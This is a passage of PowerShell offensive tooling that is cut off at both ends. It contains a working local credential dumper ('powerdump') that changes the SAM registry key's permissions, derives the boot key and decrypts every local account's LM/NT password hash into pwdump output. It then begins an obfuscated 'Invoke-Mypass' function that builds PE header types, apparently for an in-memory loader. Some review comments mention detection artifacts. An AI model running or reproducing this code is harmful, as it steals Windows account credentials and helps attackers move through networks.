$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
################################################################################
$script:PowerDump = $TypeBuilder.CreateType()
}
#######################################powerdump written by David Kennedy#########################################
# Fixed salt strings for the per-hash RC4 key, and the well-known "no password"
# LM/NT values returned when an account has no stored hash (see DecryptHashes).
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
# DES odd-parity lookup applied to each key byte in str_to_key.
$odd_parity = @(
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);
# Splits the RID into its four little-endian bytes and builds two 7-byte
# sequences from them; returns the pair of 8-byte DES keys derived via str_to_key.
function sid_to_key($sid)
{
$c0 = $sid -band 255
$c1 = ($sid -band 65280)/256
$c2 = ($sid -band 16711680)/65536
$c3 = ($sid -band 4278190080)/16777216
$s1 = @($c0, $c1, $c2, $c3, $c0, $c1, $c2)
$s2 = @($c3, $c0, $c1, $c2, $c3, $c0, $c1)
return ,((str_to_key $s1),(str_to_key $s2))
}
# Expands a 7-byte sequence into an 8-byte DES key (7 bits per output byte,
# then odd parity from the table above).
function str_to_key($s)
{
$k0 = [int][math]::Floor($s[0] * 0.5)
$k1 = ( $($s[0] -band 0x01) * 64) -bor [int][math]::Floor($s[1] * 0.25)
$k2 = ( $($s[1] -band 0x03) * 32) -bor [int][math]::Floor($s[2] * 0.125)
$k3 = ( $($s[2] -band 0x07) * 16) -bor [int][math]::Floor($s[3] * 0.0625)
$k4 = ( $($s[3] -band 0x0F) * 8) -bor [int][math]::Floor($s[4] * 0.03125)
$k5 = ( $($s[4] -band 0x1F) * 4) -bor [int][math]::Floor($s[5] * 0.015625)
$k6 = ( $($s[5] -band 0x3F) * 2) -bor [int][math]::Floor($s[6] * 0.0078125)
$k7 = $($s[6] -band 0x7F)
$key = @($k0, $k1, $k2, $k3, $k4, $k5, $k6, $k7)
0..7 | %{
$key[$_] = $odd_parity[($key[$_] * 2)]
}
return ,$key
}
# Minimal RC4 as a PSObject with script methods: init() runs the key schedule once
# into $this.S; encrypt(data) XORs the data with the keystream generated from a
# copy of S (so the object can be reused). Encrypt and decrypt are the same operation.
function NewRC4([byte[]]$key)
{
return new-object Object |
Add-Member NoteProperty key $key -PassThru |
Add-Member NoteProperty S $null -PassThru |
Add-Member ScriptMethod init {
if (-not $this.S)
{
[byte[]]$this.S = 0..255;
0..255 | % -begin{[long]$j=0;}{
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
}
}
} -PassThru |
Add-Member ScriptMethod "encrypt" {
$data = $args[0];
$this.init();
$outbuf = new-object byte[] $($data.Length);
$S2 = $this.S[0..$this.S.Length];
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
$i = ($i+1) % $S2.Length;
$j = ($j + $S2[$i]) % $S2.Length;
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
$a = $data[$_];
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
$outbuf[$_] = ($a -bxor $b);
}
return ,$outbuf;
} -PassThru
}
function des_encrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $true)
}
function des_decrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $false)
}
# Single-block DES in ECB mode with no padding; $doEncrypt selects the direction.
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
$des.Padding = [Security.Cryptography.PaddingMode]::None;
$des.Key = $key;
$des.IV = $key;
$transform = $null;
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
else{$transform = $des.CreateDecryptor();}
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
return ,$result;
}
# Returns the registry *class* string of $subkey under the given hive, via the
# P/Invoke stubs built by LoadApi. Returns "" on failure (after Write-Error).
function Get-RegKeyClass([string]$key, [string]$subkey)
{
switch ($Key) {
"HKCR" { $nKey = 0x80000000} #HK Classes Root
"HKCU" { $nKey = 0x80000001} #HK Current User
"HKLM" { $nKey = 0x80000002} #HK Local Machine
"HKU" { $nKey = 0x80000003} #HK Users
"HKCC" { $nKey = 0x80000005} #HK Current Config
default {
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
}
}
$KEYQUERYVALUE = 0x1;
$KEYREAD = 0x19;
$KEYALLACCESS = 0x3F;
$result = "";
[int]$hkey=0
if (-not $script:PowerDump::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
{
$classVal = New-Object Text.Stringbuilder 1024
[int]$len = 1024
if (-not $script:PowerDump::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
{
$result = $classVal.ToString()
}
else
{
Write-Error "RegQueryInfoKey failed";
}
$script:PowerDump::RegCloseKey($hkey) | Out-Null
}
else
{
Write-Error "Cannot open key";
}
return $result;
}
# Concatenates the class strings of the JD, Skew1, GBG and Data keys under
# Control\Lsa, hex-decodes them, and applies the fixed byte permutation below.
# Reading those four keys' class data is a recognisable access pattern.
function Get-BootKey
{
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
$b = new-object byte[] $($s.Length/2);
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
$b2 = new-object byte[] 16;
0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
return ,$b2;
}
# Derives the hashed boot key from the Account key's F value (bytes 0x70..0x7F
# salt the MD5, bytes 0x80..0x9F are RC4-decrypted). Returns $null if the key or
# value is missing.
function Get-HBootKey
{
param([byte[]]$bootkey);
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
if (-not $k) {return $null}
[byte[]]$F = $k.GetValue("F");
if (-not $F) {return $null}
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
$rc4 = NewRC4 $rc4key;
return ,($rc4.encrypt($F[0x80..0x9F]));
}
# Reads the UTF-16 user name out of a V blob using the offset at 0x0c (+0xCC)
# and the length at 0x10.
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
# Locates the encrypted LM/NT hashes inside the user's V blob and hands them to
# DecryptHashes. NOTE(review): `$u.V[0xa0..0xa3] -eq 20` compares a 4-element
# slice with a scalar, which in PowerShell yields a filtered array rather than a
# boolean; the truthiness of that array is what drives the branch. Kept as in
# the original.
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
# check if hashes exist (if byte memory equals to 20, then we've got a hash)
$LM_exists = $false;
$NT_exists = $false;
# LM header check
if ($u.V[0xa0..0xa3] -eq 20)
{
$LM_exists = $true;
}
# NT header check
elseif ($u.V[0xac..0xaf] -eq 20)
{
$NT_exists = $true;
}
if ($LM_exists -eq $true)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($NT_exists -eq $true)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}
# Returns ($lmhash, $nthash); a missing input hash maps to the empty-password
# constant defined above.
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
if ($enc_lm_hash)
{
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
}
if ($enc_nt_hash)
{
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
}
return ,($lmhash,$nthash)
}
# RC4 (key = MD5(hbootkey[0..15] + RID + salt string)) followed by two DES
# decryptions with the RID-derived keys; returns the 16-byte cleartext hash.
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
$deskeys = sid_to_key $rid;
$md5 = [Security.Cryptography.MD5]::Create();
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
$rc4 = NewRC4 $rc4_key;
$obfkey = $rc4.encrypt($enc_hash);
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
return ,$hash;
}
# Enumerates the 8-hex-digit user keys under SAM\SAM\Domains\Account\Users and
# decorates each with Rid, V (raw blob), UserName and HashOffset properties.
function Get-UserKeys
{
ls HKLM:\SAM\SAM\Domains\Account\Users |
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
Add-Member AliasProperty KeyName PSChildName -PassThru |
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}
# Orchestrates the dump: build the P/Invoke type, derive the keys, and emit one
# record per user, as a PSObject (-PSObjectFormat) or a pwdump-style line.
function DumpHashes
{
LoadApi
$bootkey = Get-BootKey;
$hbootKey = Get-HBootKey $bootkey;
Get-UserKeys | %{
$hashes = Get-UserHashes $_ $hBootKey;
if($PSObjectFormat)
{
$creds = New-Object psobject
$creds | Add-Member -MemberType NoteProperty -Name Name -Value $_.Username
$creds | Add-Member -MemberType NoteProperty -Name id -Value $_.Rid
$creds | Add-Member -MemberType NoteProperty -Name lm -Value ([BitConverter]::ToString($hashes[0])).Replace("-","").ToLower()
$creds | Add-Member -MemberType NoteProperty -Name ntlm -Value ([BitConverter]::ToString($hashes[1])).Replace("-","").ToLower()
$creds
}
else
{
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
}
}
}
# Only runs with an elevated token; returns silently otherwise.
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Return
}
else
{
# Adds an inheritable FullControl ACE for the current user on HKLM\SAM\SAM\Domains,
# presumably so the SAM subkeys can be read through the registry provider. This
# DACL modification on the SAM hive is a durable, auditable artifact (object access
# / SACL auditing on the key will record it) even though it is removed again below.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes
# Cleanup: strip every ACE for the current user and write the DACL back.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}
}
function Invoke-Mypass
{
[CmdletBinding(DefaultParameterSetName="Dumpbred")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "Dumpbred", Position = 1)]
[Switch]
$Dumpbred,
[Parameter(ParameterSetName = "Goingbots", Position = 1)]
[Switch]
$Goingbots,
[Parameter(ParameterSetName = "CustomCommand", Position = 1)]
[String]
$Command
)
Set-StrictMode -Version 2
$LSHDUGF = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$PPSDHKDSDBytSHDSDes32,
[Parameter(Position = 1, Mandatory = $true)]
[String]
$PPSDHKDSDBytes32,
[Parameter(Position = 2, Mandatory = $false)]
[String]
$FuncReturnType,
[Parameter(Position = 3, Mandatory = $false)]
[Int32]
$ProcId,
[Parameter(Position = 4, Mandatory = $false)]
[String]
$ProcName,
[Parameter(Position = 5, Mandatory = $false)]
[String]
$EAIUFHS
)
Function LGDJSR
{
$DJH32H = New-Object System.Object
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
$LHFSser = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$LHFSser.DefineLiteral('Native', [UInt16] 0) | Out-Null
$LHFSser.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$LHFSser.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$LHFSser.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
$LHFSser = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$LHFSser.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$LHFSser.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
$LHFSser = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
$LHFSser = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$LHFSser.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$LHFSser.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$LHFSser.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$LHFSser.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$LHFSser.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $KSHDSDHA_a, [System.ValueType], 8)
($LHFSser.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $KSHDSDHA_a, [System.ValueType], 20)
$LHFSser.DefineField('Machine', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $KSHDSDHA_a, [System.ValueType], 240)
($LHFSser.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($LHFSser.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($LHFSser.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($LHFSser.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($LHFSser.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($LHFSser.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($LHFSser.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($LHFSser.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($LHFSser.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($LHFSser.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($LHFSser.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($LHFSser.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($LHFSser.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($LHFSser.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($LHFSser.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($LHFSser.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($LHFSser.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($LHFSser.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($LHFSser.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($LHFSser.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($LHFSser.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($LHFSser.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($LHFSser.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
($LHFSser.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
($LHFSser.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
($LHFSser.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
($LHFSser.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
($LHFSser.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
($LHFSser.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($LHFSser.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($LHFSser.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($LHFSser.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($LHFSser.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($LHFSser.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($LHFSser.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($LHFSser.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($LHFSser.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($LHFSser.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($LHFSser.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($LHFSser.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($LHFSser.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($LHFSser.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
($LHFSser.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
($LHFSser.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
$IMAGE_OPTIONAL_HEADER64 = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $KSHDSDHA_a, [System.ValueType], 224)
($LHFSser.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($LHFSser.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($LHFSser.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($LHFSser.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($LHFSser.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($LHFSser.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($LHFSser.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($LHFSser.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
($LHFSser.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
($LHFSser.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($LHFSser.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($LHFSser.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($LHFSser.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($LHFSser.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($LHFSser.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($LHFSser.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($LHFSser.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($LHFSser.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($LHFSser.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($LHFSser.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($LHFSser.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($LHFSser.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($LHFSser.DefineField('DllCharacteristics', $DllCharacteristicsType